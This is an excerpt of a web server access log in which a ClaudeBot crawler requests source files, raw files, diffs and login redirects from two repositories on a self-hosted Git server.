"/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/vite.config.ts?display=source" [Client 216.73.216.188] [Length 11907] [Gzip 3.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:20:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/.TemporaryDocument/DOCKER_QUICKSTART.md?display=source" [Client 216.73.216.188] [Length 18123] [Gzip 5.63] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:20:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/python" [Client 216.73.216.188] [Length 7] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:20:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/App.tsx?display=source" [Client 216.73.216.188] [Length 12760] [Gzip 3.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:20:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/include/site/python3.12/greenlet" [Client 216.73.216.188] [Length 9979] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:20:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/python3?display=source" [Client 216.73.216.188] [Length 11088] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:20:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets" [Client 216.73.216.188] [Length 10869] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:20:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/Dockerfile" [Client 216.73.216.188] [Length 11574] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:20:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/python?display=source" [Client 216.73.216.188] [Length 11079] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:20:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/nginx-reverse-proxy.conf" [Client 216.73.216.188] [Length 11657] [Gzip 3.29] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:20:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/python3.12" [Client 216.73.216.188] [Length 11068] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:20:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/include/site/python3.12" [Client 216.73.216.188] [Length 9966] [Gzip 2.91] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:20:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/index.html" [Client 216.73.216.188] [Length 32409] [Gzip 9.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:20:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/fallback_error.log" [Client 216.73.216.188] [Length 11361] [Gzip 3.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:20:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/status.json" [Client 216.73.216.188] [Length 11026] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:20:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/include/site/python3.12" [Client 216.73.216.188] [Length 9967] [Gzip 2.91] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:20:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/docker-compose.yml" [Client 216.73.216.188] [Length 12580] [Gzip 3.83] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:20:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/fallback_http_error.log" [Client 216.73.216.188] [Length 14463] [Gzip 4.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:20:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/python3" [Client 216.73.216.188] [Length 11070] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:20:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/python" [Client 216.73.216.188] [Length 11060] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:20:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/python?display=rendered" [Client 216.73.216.188] [Length 11029] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:20:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html" [Client 216.73.216.188] [Length 14295] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:20:05 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_delete/main/npm/data/nginx/proxy_host/4.conf" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:20:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/90c7377285c0e63de46467557a2f081b33097f03.patch" [Client 216.73.216.188] [Length 17464] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:20:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/homepage/_delete/main/npm/data/nginx/proxy_host/4.conf" -[15/Feb/2026:13:20:05 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_delete/main/npm/data/nginx/proxy_host/3.conf" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:20:05 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_edit/main/npm/data/nginx/proxy_host/4.conf" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:20:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/homepage/_delete/main/npm/data/nginx/proxy_host/3.conf" -[15/Feb/2026:13:20:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/90c7377285c0e63de46467557a2f081b33097f03.diff" [Client 216.73.216.188] [Length 16885] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:20:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/homepage/_edit/main/npm/data/nginx/proxy_host/4.conf" -[15/Feb/2026:13:20:05 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_delete/main/.Backup/html/components/Header.tsx" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:20:05 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_delete/main/npm/data/nginx/proxy_host/2.conf" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:20:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/homepage/_delete/main/.Backup/html/components/Header.tsx" -[15/Feb/2026:13:20:06 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_edit/main/npm/data/nginx/proxy_host/3.conf" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:20:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/homepage/_delete/main/npm/data/nginx/proxy_host/2.conf" -[15/Feb/2026:13:20:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/python" [Client 216.73.216.188] [Length 9957] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:20:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/homepage/_edit/main/npm/data/nginx/proxy_host/3.conf" -[15/Feb/2026:13:20:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/python" [Client 216.73.216.188] [Length 7] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:20:06 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_edit/main/npm/data/nginx/proxy_host/2.conf" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:20:06 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_edit/main/.Backup/html/components/Header.tsx" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:20:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/homepage/_edit/main/npm/data/nginx/proxy_host/2.conf" -[15/Feb/2026:13:20:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/python?display=source" [Client 216.73.216.188] [Length 11084] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:20:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/homepage/_edit/main/.Backup/html/components/Header.tsx" -[15/Feb/2026:13:20:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/proxy-host-4_error.log" [Client 216.73.216.188] [Length 69548] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:20:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/proxy-host-3_error.log" [Client 216.73.216.188] [Length 9453] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:20:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/letsencrypt-requests_error.log" [Client 216.73.216.188] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:20:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/docker-compose.yml?display=rendered" [Client 216.73.216.188] [Length 10897] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:20:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/activate?display=rendered" [Client 216.73.216.188] [Length 11005] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:20:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/activate.fish" [Client 216.73.216.188] [Length 2221] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:20:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/activate.fish" [Client 216.73.216.188] [Length 9970] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:20:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2FAssetPilot%2Fcommits%2Fbranch%2Fmain%2Fasset_pilot_docker%2F.venv%2Fbin%2Fpython" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:20:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/npm/data/nginx/proxy_host/2.conf?display=rendered" [Client 216.73.216.188] [Length 11233] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:20:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/fallback_error.log?display=rendered" [Client 216.73.216.188] [Length 10971] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:20:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/normalizer?display=rendered" [Client 216.73.216.188] [Length 11034] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:20:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/find/commit/90c7377285c0e63de46467557a2f081b33097f03" [Client 216.73.216.188] [Length 7505] [Gzip 2.66] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:20:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/nginx-reverse-proxy.conf" [Client 216.73.216.188] [Length 9918] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:20:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/fallback_stream_access.log?display=source" [Client 216.73.216.188] [Length 10988] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:20:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/proxy-host-2_error.log" [Client 216.73.216.188] [Length 9939] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:20:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/include/site/python3.12/greenlet/greenlet.h" [Client 216.73.216.188] [Length 15771] [Gzip 5.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:20:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/proxy-host-2_error.log" [Client 216.73.216.188] [Length 20991] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:20:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/nginx-reverse-proxy.conf" [Client 216.73.216.188] [Length 620] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:20:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/activate.csh?display=source" [Client 216.73.216.188] [Length 12182] [Gzip 3.33] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:20:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2FAssetPilot%2Fcommits%2Fcommit%2Ffc1462a3f3e004bb33b52808fd01df2dfdbf79d3%2F.TemporaryDocument" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:20:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/proxy-host-1_error.log?display=source" [Client 216.73.216.188] [Length 16232] [Gzip 7.21] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:20:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/activate.fish?display=source" [Client 216.73.216.188] [Length 13544] [Gzip 3.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:20:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/dotenv" [Client 216.73.216.188] [Length 9960] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:20:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/dotenv" [Client 216.73.216.188] [Length 256] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:20:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03" [Client 216.73.216.188] [Length 11374] [Gzip 4.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:20:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/html/index.html" [Client 216.73.216.188] [Length 10836] [Gzip 4.35] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:20:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/components/Header.tsx" [Client 216.73.216.188] [Length 14846] [Gzip 4.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:20:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/Dockerfile?display=source" [Client 216.73.216.188] [Length 11593] [Gzip 